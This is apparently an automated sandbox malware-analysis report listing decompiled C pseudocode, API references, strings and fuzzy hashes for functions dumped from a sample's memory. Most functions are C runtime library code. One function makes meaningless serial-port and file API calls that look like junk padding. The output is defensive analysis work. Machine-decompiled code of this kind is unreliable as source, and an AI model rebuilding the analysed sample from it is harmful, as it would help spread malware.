Instruction Fuzzy Hash: F91181719007009FD710AF769C41B5ABBF4AF44314F10852FE499BB2E1DB789A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040832B Relevance: 18.1, APIs: 12, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040832B(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr* _t36;
				intOrPtr _t38;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t47;
				void* _t54;
				void* _t55;
				void* _t57;
				void* _t59;
				intOrPtr _t71;

				_t57 = __esi;
				_t55 = __edi;
				_t47 = __ebx;
				 *__eax =  *__eax + __eax;
				_t61 =  *((intOrPtr*)(__eax + 0x14)) - __ebx;
				if( *((intOrPtr*)(__eax + 0x14)) == __ebx) {
					L3:
					_t25 =  *((intOrPtr*)(E0040D8A2(_t47, _t54, _t63) + 0x88));
					 *_t25 =  *_t25 + _t25;
					_t26 = E00409764( *((intOrPtr*)(_t25 + 0x18)));
					_t64 = _t26;
					if(_t26 != 0) {
						_push(1);
						_push( *((intOrPtr*)(E0040D8A2(_t47, _t54, _t64) + 0x88)));
						E00408138(_t64);
					}
				} else {
					_t44 =  *((intOrPtr*)(E0040D8A2(__ebx, _t54, _t61) + 0x88));
					_t62 =  *((intOrPtr*)(_t44 + 0x14)) - 0x19930521;
					if( *((intOrPtr*)(_t44 + 0x14)) == 0x19930521) {
						goto L3;
					} else {
						_t46 =  *((intOrPtr*)(E0040D8A2(__ebx, _t54, _t62) + 0x88));
						_t63 =  *((intOrPtr*)(_t46 + 0x14)) - 0x19930522;
						if( *((intOrPtr*)(_t46 + 0x14)) == 0x19930522) {
							goto L3;
						}
					}
				}
				_t27 = E0040D8A2(_t47, _t54, _t64);
				_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x88)))) - _t55;
				if( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x88)))) == _t55) {
					_t32 =  *((intOrPtr*)(E0040D8A2(_t47, _t54, _t65) + 0x88));
					_t66 =  *((intOrPtr*)(_t32 + 0x10)) - 3;
					if( *((intOrPtr*)(_t32 + 0x10)) == 3) {
						_t34 =  *((intOrPtr*)(E0040D8A2(_t47, _t54, _t66) + 0x88));
						_t67 =  *((intOrPtr*)(_t34 + 0x14)) - _t47;
						if( *((intOrPtr*)(_t34 + 0x14)) == _t47) {
							L11:
							_t70 =  *((intOrPtr*)(_t59 + 0xc));
							if( *((intOrPtr*)(_t59 + 0xc)) != 0) {
								_t36 = E0040D8A2(_t47, _t54, _t70) + 0x90;
								 *_t36 =  *_t36 - 1;
								_t71 =  *_t36;
							}
						} else {
							_t38 =  *((intOrPtr*)(E0040D8A2(_t47, _t54, _t67) + 0x88));
							_t68 =  *((intOrPtr*)(_t38 + 0x14)) - 0x19930521;
							if( *((intOrPtr*)(_t38 + 0x14)) == 0x19930521 ||  *((intOrPtr*)( *((intOrPtr*)(E0040D8A2(_t47, _t54, _t68) + 0x88)) + 0x14)) == 0x19930522) {
								goto L11;
							}
						}
					}
				}
				 *((intOrPtr*)(E0040D8A2(_t47, _t54, _t71) + 0x88)) =  *((intOrPtr*)(_t57 + 8));
				_t30 = E0040D8A2(_t47, _t54, _t71);
				 *((intOrPtr*)(_t30 + 0x8c)) =  *((intOrPtr*)(_t57 + 0xc));
				return _t30;
			}

0x0040832b
0x0040832b
0x0040832b
0x0040832b
0x0040832d
0x00408330
0x0040835a
0x0040835f
0x00408363
0x00408368
0x0040836e
0x00408370
0x00408372
0x00408379
0x0040837f
0x00408385
0x00408332
0x00408337
0x0040833d
0x00408344
0x00000000
0x00408346
0x0040834b
0x00408351
0x00408358
0x00000000
0x00000000
0x00408358
0x00408344
0x00408386
0x00408391
0x00408393
0x0040839a
0x004083a0
0x004083a4
0x004083ab
0x004083b1
0x004083b4
0x004083de
0x004083de
0x004083e2
0x004083e9
0x004083ee
0x004083ee
0x004083ee
0x004083b6
0x004083bb
0x004083c1
0x004083c8
0x00000000
0x00000000
0x004083c8
0x004083b4
0x004083a4
0x004083f8
0x004083fe
0x00408407
0x00408410

APIs

__getptd.LIBCMT ref: 00408346
__getptd.LIBCMT ref: 00408332

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__getptd.LIBCMT ref: 0040835A
__getptd.LIBCMT ref: 00408374
__getptd.LIBCMT ref: 00408386
__getptd.LIBCMT ref: 00408395
__getptd.LIBCMT ref: 004083A6
__getptd.LIBCMT ref: 004083B6
__getptd.LIBCMT ref: 004083CA
__getptd.LIBCMT ref: 004083E4
__getptd.LIBCMT ref: 004083F0
__getptd.LIBCMT ref: 004083FE

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID:
API String ID: 803148776-0
Opcode ID: cdb3e0562fa4f4a980714f01431db5a786543aae4ed83d25731ac25ff5823b88
Instruction ID: c4048d0fc4dfda10fb38463d0b4548619f25d12682d5f18667d1c0dba2737015
Opcode Fuzzy Hash: cdb3e0562fa4f4a980714f01431db5a786543aae4ed83d25731ac25ff5823b88
Instruction Fuzzy Hash: 7C21BE31900200DFD624BFAAD245B553790BF50315F8980BEE498AB6A3CF39D888DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF30 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041FF30(intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v28;
				void* __esi;
				char _t31;
				void* _t34;
				intOrPtr _t35;
				char _t37;
				void* _t38;
				void* _t40;
				void* _t48;
				char* _t64;
				char* _t66;
				void* _t70;
				intOrPtr* _t71;

				_t64 =  *0x4ba41c;
				_v8 = _v8 & 0xffff0000;
				_t31 =  *_t64;
				_v12 = 0;
				if(_t31 == 0) {
					L19:
					E0041C4AF(0xffff0000, _a4, 1, _a8);
					L20:
					L21:
					return _a4;
				}
				_t34 = _t31 - 0x24;
				if(_t34 == 0) {
					_t35 =  *((intOrPtr*)(_t64 + 1));
					if(_t35 == 0x24) {
						_t66 = _t64 + 2;
						 *0x4ba41c = _t66;
						_t37 =  *_t66;
						if(_t37 == 0) {
							goto L19;
						}
						_t38 = _t37 - 0x41;
						if(_t38 == 0) {
							 *0x4ba41c = _t66 + 1;
							E0041EFA9(_t66 + 1, _a4, _a8);
							L5:
							goto L21;
						}
						_t40 = _t38 - 1;
						if(_t40 == 0) {
							 *0x4ba41c = _t66 + 1;
							E0041D126(_t70, _a4, _a8, 1);
							goto L20;
						}
						if(_t40 != 1) {
							L11:
							E0041BA57(_a4, 2);
							goto L21;
						}
						_v8 = _v8 & 0xffff0000;
						 *0x4ba41c = _t66 + 1;
						_v12 = 0;
						E0041FB79(0xffff0000, _t66 + 1, _a4, E0041F2FD( &_v28, _a8, 0,  &_v12, 0));
						goto L21;
					}
					if(_t35 == 0) {
						goto L19;
					}
					goto L11;
				}
				_t48 = _t34 - 0x1d;
				_t71 = _a8;
				if(_t48 == 0) {
					L8:
					 *0x4ba41c =  *0x4ba41c + 1;
					_v20 =  *_t71;
					_v16 =  *(_t71 + 4) | 0x00000100;
					E0041FA28(_a4,  &_v12,  &_v20);
					goto L20;
				}
				if(_t48 == 1) {
					E0041C11F( &_v12, "volatile");
					if( *_t71 != 0) {
						E0041C27F( &_v12, 0x20);
					}
					goto L8;
				}
				E0041FB79(0xffff0000, _t64, _a4, _t71);
				goto L5;
			}

0x0041ff38
0x0041ff49
0x0041ff4c
0x0041ff4f
0x0041ff52
0x00420051
0x00420059
0x0042005e
0x00420061
0x00420067
0x00420067
0x0041ff58
0x0041ff5b
0x0041ffbf
0x0041ffc4
0x0041ffde
0x0041ffdf
0x0041ffe8
0x0041ffea
0x00000000
0x00000000
0x0041ffec
0x0041ffef
0x00420041
0x00420047
0x0041ff71
0x00000000
0x0041ff72
0x0041fff1
0x0041fff2
0x0042002d
0x00420033
0x00000000
0x00420033
0x0041fff5
0x0041ffce
0x0041ffd3
0x00000000
0x0041ffd3
0x0041fff7
0x00420008
0x0042000e
0x0042001a
0x00000000
0x0042001f
0x0041ffc8
0x00000000
0x00000000
0x00000000
0x0041ffc8
0x0041ff5d
0x0041ff60
0x0041ff63
0x0041ff93
0x0041ff98
0x0041ff9e
0x0041ffb2
0x0041ffb5
0x00000000
0x0041ffb5
0x0041ff66
0x0041ff80
0x0041ff87
0x0041ff8e
0x0041ff8e
0x00000000
0x0041ff87
0x0041ff6c
0x00000000

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 0041FF6C
DName::operator=.LIBCMT ref: 0041FF80
DName::operator+=.LIBCMT ref: 0041FF8E
UnDecorator::getReferenceType.LIBCMT ref: 0041FFB5
DName::DName.LIBCMT ref: 0041FFD3
UnDecorator::getDataIndirectType.LIBCMT ref: 00420011
UnDecorator::getBasicDataType.LIBCMT ref: 0042001A
operator+.LIBCMT ref: 00420059

Strings

volatile, xrefs: 0041FF78

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectNameName::Name::operator+=Name::operator=Referenceoperator+
String ID: volatile
API String ID: 2092030914-4266433718
Opcode ID: dcc884526d95674297886906cf758d85c6f74fc87dd06268ee5a861e5cb914bf
Instruction ID: 97da3d65aa1870c064eee46518f63a82ee8d975f6d30da9da28ee664773e2d84
Opcode Fuzzy Hash: dcc884526d95674297886906cf758d85c6f74fc87dd06268ee5a861e5cb914bf
Instruction Fuzzy Hash: 8D31EE71900118AFDF109FA5EC859FEBFA9FB01340F40C17BF84566252D6B99AC78B89

Uniqueness

Uniqueness Score: -1.00%

Function 00408A10 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00408A10(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t28;
				void* _t29;
				signed int* _t31;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				signed int* _t38;
				signed int _t41;
				signed int _t49;
				signed int _t52;
				void* _t53;
				signed int _t55;
				signed int _t57;
				signed int _t59;
				void* _t61;
				void* _t62;

				_t28 = _a4;
				_t62 = _t61 - 0x10;
				if(_t28 != 0) {
					_t49 = _a12;
					_t59 =  *_t28;
					_t55 = _a8;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t29 =  *_t59;
						__eflags = _t29 - 0xe0434f4d;
						if(_t29 == 0xe0434f4d) {
							L21:
							__eflags = _t29 - 0xe06d7363;
							if(__eflags != 0) {
								L29:
								_t31 = E0040D8A2(_t49, _t53, __eflags) + 0x90;
								 *_t31 =  *_t31 + 1;
								__eflags =  *_t31;
								goto L30;
							} else {
								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
								if(__eflags != 0) {
									goto L29;
								} else {
									_t34 =  *((intOrPtr*)(_t59 + 0x14));
									__eflags = _t34 - 0x19930520;
									if(_t34 == 0x19930520) {
										L26:
										__eflags =  *(_t59 + 0x1c);
										if(__eflags != 0) {
											goto L29;
										} else {
											__eflags =  *(E0040D8A2(_t49, _t53, __eflags) + 0x88);
											if(__eflags != 0) {
												goto L29;
											} else {
												goto L28;
											}
										}
									} else {
										__eflags = _t34 - 0x19930521;
										if(_t34 == 0x19930521) {
											goto L26;
										} else {
											__eflags = _t34 - 0x19930522;
											if(__eflags != 0) {
												goto L29;
											} else {
												goto L26;
											}
										}
									}
								}
							}
						} else {
							__eflags = _t49 & 0x00000040;
							if((_t49 & 0x00000040) == 0) {
								goto L21;
							} else {
								goto L6;
							}
						}
					} else {
						__eflags =  *((char*)(_t55 + 8));
						if( *((char*)(_t55 + 8)) != 0) {
							L6:
							__eflags =  *_t59 - 0xe06d7363;
							if( *_t59 != 0xe06d7363) {
								L28:
								_t33 = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
								if( *((intOrPtr*)(_t59 + 0x10)) != 3) {
									goto L28;
								} else {
									_t36 =  *((intOrPtr*)(_t59 + 0x14));
									__eflags = _t36 - 0x19930520;
									if(_t36 == 0x19930520) {
										L11:
										__eflags =  *(_t59 + 0x1c);
										if(__eflags != 0) {
											L14:
											_t38 =  *( *(_t59 + 0x1c) + 0xc);
											_v16 = _t55;
											_t57 =  *_t38;
											_v20 = _t49 | 0x80000000;
											_t52 =  &(_t38[1]);
											while(1) {
												__eflags = _t57;
												if(_t57 <= 0) {
													break;
												}
												_a4 =  *_t52;
												_t41 = E00407F6A( &_v20,  *_t52,  *(_t59 + 0x1c));
												_t62 = _t62 + 0xc;
												__eflags = _t41;
												if(__eflags != 0) {
													 *((intOrPtr*)(E0040D8A2(_t52, _t53, __eflags) + 0x90)) =  *((intOrPtr*)(E0040D8A2(_t52, _t53, __eflags) + 0x90)) + 1;
													__eflags = _a16;
													if(__eflags != 0) {
														_push(_a4);
														_push( &_v20);
														_push(_a16);
														_push(_t59);
														E0040897E(_t52, _t57, _t59, __eflags);
													}
													L30:
													_t33 = 1;
													__eflags = 1;
												} else {
													_t57 = _t57 - 1;
													_t52 = _t52 + 4;
													__eflags = _t52;
													continue;
												}
												goto L31;
											}
											goto L28;
										} else {
											__eflags =  *(E0040D8A2(_t49, _t53, __eflags) + 0x88);
											if(__eflags == 0) {
												goto L28;
											} else {
												_t59 =  *(E0040D8A2(_t49, _t53, __eflags) + 0x88);
												goto L14;
											}
										}
									} else {
										__eflags = _t36 - 0x19930521;
										if(_t36 == 0x19930521) {
											goto L11;
										} else {
											__eflags = _t36 - 0x19930522;
											if(_t36 != 0x19930522) {
												goto L28;
											} else {
												goto L11;
											}
										}
									}
								}
							}
						} else {
							goto L4;
						}
					}
					L31:
					return _t33;
				} else {
					return _t28;
				}
			}

0x00408a15
0x00408a18
0x00408a1d
0x00408a22
0x00408a26
0x00408a29
0x00408a2c
0x00408a2e
0x00408a36
0x00408a36
0x00408a38
0x00408a3d
0x00408b04
0x00408b04
0x00408b09
0x00408b41
0x00408b46
0x00408b4b
0x00408b4b
0x00000000
0x00408b0b
0x00408b0b
0x00408b0f
0x00000000
0x00408b11
0x00408b11
0x00408b14
0x00408b19
0x00408b29
0x00408b29
0x00408b2d
0x00000000
0x00408b2f
0x00408b34
0x00408b3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00408b3b
0x00408b1b
0x00408b1b
0x00408b20
0x00000000
0x00408b22
0x00408b22
0x00408b27
0x00000000
0x00000000
0x00000000
0x00000000
0x00408b27
0x00408b20
0x00408b19
0x00408b0f
0x00408a43
0x00408a43
0x00408a46
0x00000000
0x00000000
0x00000000
0x00000000
0x00408a46
0x00408a30
0x00408a30
0x00408a34
0x00408a4c
0x00408a4c
0x00408a52
0x00408b3d
0x00408b3d
0x00408a58
0x00408a58
0x00408a5c
0x00000000
0x00408a62
0x00408a62
0x00408a65
0x00408a6a
0x00408a7e
0x00408a7e
0x00408a82
0x00408aa1
0x00408aa4
0x00408aad
0x00408ab0
0x00408ab2
0x00408ab5
0x00408ad7
0x00408ad7
0x00408ad9
0x00000000
0x00000000
0x00408abf
0x00408ac7
0x00408acc
0x00408acf
0x00408ad1
0x00408ae7
0x00408ae9
0x00408aed
0x00408aef
0x00408af5
0x00408af6
0x00408af9
0x00408afa
0x00408aff
0x00408b4d
0x00408b4f
0x00408b4f
0x00408ad3
0x00408ad3
0x00408ad4
0x00408ad4
0x00000000
0x00408ad4
0x00000000
0x00408ad1
0x00000000
0x00408a84
0x00408a89
0x00408a90
0x00000000
0x00408a96
0x00408a9b
0x00000000
0x00408a9b
0x00408a90
0x00408a6c
0x00408a6c
0x00408a71
0x00000000
0x00408a73
0x00408a73
0x00408a78
0x00000000
0x00000000
0x00000000
0x00000000
0x00408a78
0x00408a71
0x00408a6a
0x00408a5c
0x00000000
0x00000000
0x00000000
0x00408a34
0x00408b50
0x00408b54
0x00408a20
0x00408a20
0x00408a20

APIs

__getptd.LIBCMT ref: 00408A84
__getptd.LIBCMT ref: 00408A96

Strings

MOC, xrefs: 00408A38
csm, xrefs: 00408B04
csm, xrefs: 00408A4C

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __getptd
String ID: MOC$csm$csm
API String ID: 3384420010-2232927589
Opcode ID: ce90aef383073b7492b053718608dd18bf24e55e66a0029d7395d9fa5f5d76f9
Instruction ID: bcaa3ec9c6cc5fd971f60346f46bdbb6e21f9a3e793895f9e4c527d1d6f3b27c
Opcode Fuzzy Hash: ce90aef383073b7492b053718608dd18bf24e55e66a0029d7395d9fa5f5d76f9
Instruction Fuzzy Hash: 8D31A0719002048FDB309E59C645B6BB3B8AF10314F58487FE8C5A6791DB3CE985CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00404CF0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 76
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404CF0() {
				char _v1028;
				struct _COMM_CONFIG _v1088;
				long _v1092;
				struct _COMMTIMEOUTS _v1116;
				char _v1120;
				intOrPtr _v1124;
				void* __edi;
				long _t21;
				void* _t23;
				char _t38;
				intOrPtr* _t44;
				void* _t52;

				_t52 =  &_v1120;
				_t38 =  *0x53c1f8;
				_t21 =  *0x53c47c >> 3;
				if(_t21 > 0) {
					_t44 = __imp__FindVolumeClose;
					_v1120 = _t38;
					_v1116.ReadIntervalTimeout = _t21;
					do {
						if( *0x53c47c == 0x959) {
							ClearCommError(0,  &_v1092,  &_v1088);
							 *_t44(0);
							_v1116.ReadIntervalTimeout = 0;
							_v1116.ReadTotalTimeoutMultiplier = 0;
							_v1116.ReadTotalTimeoutConstant = 0;
							_v1116.WriteTotalTimeoutMultiplier = 0;
							_v1116.WriteTotalTimeoutConstant = 0;
							SetCommTimeouts(0,  &_v1116);
							PurgeComm(0, 0);
							BeginUpdateResourceA("codamecu", 0);
							__imp__GetSystemWindowsDirectoryA( &_v1028, 0);
							LockFile(0, 0, 0, 0, 0);
							_v1088.dwSize = 0;
							E0040EB00(_t44,  &(_v1088.wVersion), 0, 0x30);
							_t52 = _t52 + 0xc;
							GetCommConfig(0,  &_v1088, 0);
						}
						_t23 = E00404AB0(_v1120);
						_v1124 = _v1124 + 8;
						_t18 =  &_v1120;
						 *_t18 = _v1120 - 1;
					} while ( *_t18 != 0);
					return _t23;
				}
				return _t21;
			}

0x00404cfe
0x00404cf5
0x00404cfb
0x00404d06
0x00404d22
0x00404d28
0x00404d2c
0x00404d30
0x00404d3a
0x00404d4c
0x00404d50
0x00404d5a
0x00404d5e
0x00404d62
0x00404d66
0x00404d6a
0x00404d6e
0x00404d74
0x00404d7d
0x00404d8a
0x00404d9a
0x00404da9
0x00404db1
0x00404db6
0x00404dc2
0x00404dc2
0x00404dcd
0x00404dd2
0x00404dd7
0x00404dd7
0x00404dd7
0x00000000
0x00404de5
0x00404dec

APIs

ClearCommError.KERNEL32(00000000,?,?,7491EF70,00000000,000004CB,74CB4D40), ref: 00404D4C
FindVolumeClose.KERNEL32(00000000), ref: 00404D50
SetCommTimeouts.KERNEL32(00000000,?), ref: 00404D6E
PurgeComm.KERNEL32(00000000,00000000), ref: 00404D74
BeginUpdateResourceA.KERNEL32 ref: 00404D7D
GetSystemWindowsDirectoryA.KERNEL32 ref: 00404D8A
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404D9A
_memset.LIBCMT ref: 00404DB1
GetCommConfig.KERNEL32(00000000,?,00000000,?,00000000,00000030), ref: 00404DC2

Strings

codamecu, xrefs: 00404D78

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Comm$BeginClearCloseConfigDirectoryErrorFileFindLockPurgeResourceSystemTimeoutsUpdateVolumeWindows_memset
String ID: codamecu
API String ID: 2467324181-2556480590
Opcode ID: 4b99d1387f8a1c72c5c6b314511cb04a1a1eaeaee123284b3da6a3cb1e8eac80
Instruction ID: 318fd9de162ce9d902c0f2dc0ad480e45386637bd80a39bce1d628d901fdb792
Opcode Fuzzy Hash: 4b99d1387f8a1c72c5c6b314511cb04a1a1eaeaee123284b3da6a3cb1e8eac80
Instruction Fuzzy Hash: C22162B1558340AFD300EF65DD45B6B7BE8BB88705F00092EF784E2290E7749548CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEEE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041DEEE(void* __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char* _t15;
				intOrPtr* _t18;
				void* _t21;
				void* _t24;
				void* _t41;

				_t41 = __edx;
				E0041BE23( &_v12, E0041B494(0));
				_t15 =  *0x4ba41c;
				if( *_t15 == 0) {
					E0041BD38( &_v12, 1);
					goto L8;
				} else {
					 *0x4ba41c = _t15 + 1;
					_t21 =  *_t15 - 0x30;
					if(_t21 == 0) {
						E0041C2D1( &_v12, "void");
						goto L8;
					} else {
						_t24 = _t21;
						if(_t24 == 0) {
							E0041C048( &_v12, E0041DCB9(_t41, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t24 != 3) {
								L8:
								E0041C2D1( &_v12, ") ");
								_t18 = _a4;
								 *_t18 = _v12;
								 *((intOrPtr*)(_t18 + 4)) = _v8;
								return _t18;
							} else {
								E0041BA57(_a4, 2);
								return _a4;
							}
						}
					}
				}
			}

0x0041deee
0x0041df04
0x0041df09
0x0041df11
0x0041df64
0x00000000
0x0041df13
0x0041df17
0x0041df1e
0x0041df21
0x0041df58
0x00000000
0x0041df23
0x0041df24
0x0041df25
0x0041df49
0x00000000
0x0041df27
0x0041df2a
0x0041df69
0x0041df71
0x0041df79
0x0041df7c
0x0041df81
0x0041df85
0x0041df2c
0x0041df31
0x0041df3a
0x0041df3a
0x0041df2a
0x0041df25
0x0041df21

APIs

UnDecorator::UScore.LIBCMT ref: 0041DEF8
DName::DName.LIBCMT ref: 0041DF04

Part of subcall function 0041BE23: DName::doPchar.LIBCMT ref: 0041BE50

DName::DName.LIBCMT ref: 0041DF31

Part of subcall function 0041BA57: DNameStatusNode::make.LIBCMT ref: 0041BA85

UnDecorator::getScopedName.LIBCMT ref: 0041DF3F
DName::operator+=.LIBCMT ref: 0041DF49
DName::operator+=.LIBCMT ref: 0041DF58
DName::operator+=.LIBCMT ref: 0041DF64
DName::operator+=.LIBCMT ref: 0041DF71

Strings

void, xrefs: 0041DF50

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: NameName::operator+=$Name::$Decorator::Decorator::getName::doNode::makePcharScopedScoreStatus
String ID: void
API String ID: 2229739886-3531332078
Opcode ID: b762e9486831686b25010f2d86a7e6b70a784bafe2e20991119d8008a555ffd5
Instruction ID: eba14c0c47215eea536e5e59e9e885d559d553389c333a7efaebea0ac5072d0a
Opcode Fuzzy Hash: b762e9486831686b25010f2d86a7e6b70a784bafe2e20991119d8008a555ffd5
Instruction Fuzzy Hash: 3F1156B1D44108ABC708EBA5DC56AED7B64DF14304F00409BB416A72D2DB78DBC6CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9FF Relevance: 15.1, APIs: 10, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A9FF(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				void* _t43;
				intOrPtr* _t51;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t51 = E0040DC72(8, 1);
					if(_t51 != 0) {
						_t13 = E0040DC72(0xd8, 1);
						 *_t51 = _t13;
						__eflags = _t13;
						if(__eflags != 0) {
							_t14 = E0040DC72(0x220, 1);
							 *((intOrPtr*)(_t51 + 4)) = _t14;
							__eflags = _t14;
							if(__eflags != 0) {
								E00409C43( *_t51, 0x4b8858);
								_t48 =  *_t51;
								_t17 = E0040A7E4(_a8,  *_t51, _a4);
								_pop(_t43);
								__eflags = _t17;
								if(__eflags != 0) {
									__eflags = E004144EB(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
									if(__eflags == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										L17:
										return _t51;
									}
									_push( *((intOrPtr*)(_t51 + 4)));
									E00409330(__ebx, 1, _t51, __eflags);
									E00409BAA( *_t51);
									E004099D2( *_t51);
									_push(_t51);
									E00409330(__ebx, 1, _t51, __eflags);
									L15:
									_t51 = 0;
									goto L17;
								}
								E00409BAA( *_t51);
								E004099D2( *_t51);
								_push(_t51);
								E00409330(__ebx, 1, _t51, __eflags);
								goto L15;
							}
							_push( *_t51);
							E00409330(__ebx, 1, _t51, __eflags);
							_push(_t51);
							E00409330(__ebx, 1, _t51, __eflags);
							L8:
							goto L3;
						}
						_push(_t51);
						E00409330(__ebx, 1, _t51, __eflags);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E0040BCDC())) = 0xc;
					goto L4;
				}
			}

0x0040aa0a
0x0040aa30
0x00000000
0x0040aa12
0x0040aa1d
0x0040aa23
0x0040aa3c
0x0040aa43
0x0040aa45
0x0040aa47
0x0040aa58
0x0040aa5f
0x0040aa62
0x0040aa64
0x0040aa7d
0x0040aa88
0x0040aa8a
0x0040aa8f
0x0040aa90
0x0040aa92
0x0040aabc
0x0040aabe
0x0040aae6
0x0040aaeb
0x0040aaed
0x00000000
0x0040aaed
0x0040aac0
0x0040aac3
0x0040aaca
0x0040aad1
0x0040aad6
0x0040aad7
0x0040aadf
0x0040aadf
0x00000000
0x0040aadf
0x0040aa96
0x0040aa9d
0x0040aaa2
0x0040aaa3
0x00000000
0x0040aaa8
0x0040aa66
0x0040aa68
0x0040aa6d
0x0040aa6e
0x0040aa4f
0x00000000
0x0040aa4f
0x0040aa49
0x0040aa4a
0x00000000
0x0040aa4a
0x0040aa25
0x0040aa2a
0x00000000
0x0040aa2a

APIs

__calloc_crt.LIBCMT ref: 0040AA18

Part of subcall function 0040DC72: __calloc_impl.LIBCMT ref: 0040DC83
Part of subcall function 0040DC72: Sleep.KERNEL32(00000000), ref: 0040DC9A

__calloc_crt.LIBCMT ref: 0040AA3C
__calloc_crt.LIBCMT ref: 0040AA58
__copytlocinfo_nolock.LIBCMT ref: 0040AA7D
__setlocale_nolock.LIBCMT ref: 0040AA8A
___removelocaleref.LIBCMT ref: 0040AA96
___freetlocinfo.LIBCMT ref: 0040AA9D
__setmbcp_nolock.LIBCMT ref: 0040AAB5
___removelocaleref.LIBCMT ref: 0040AACA
___freetlocinfo.LIBCMT ref: 0040AAD1

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
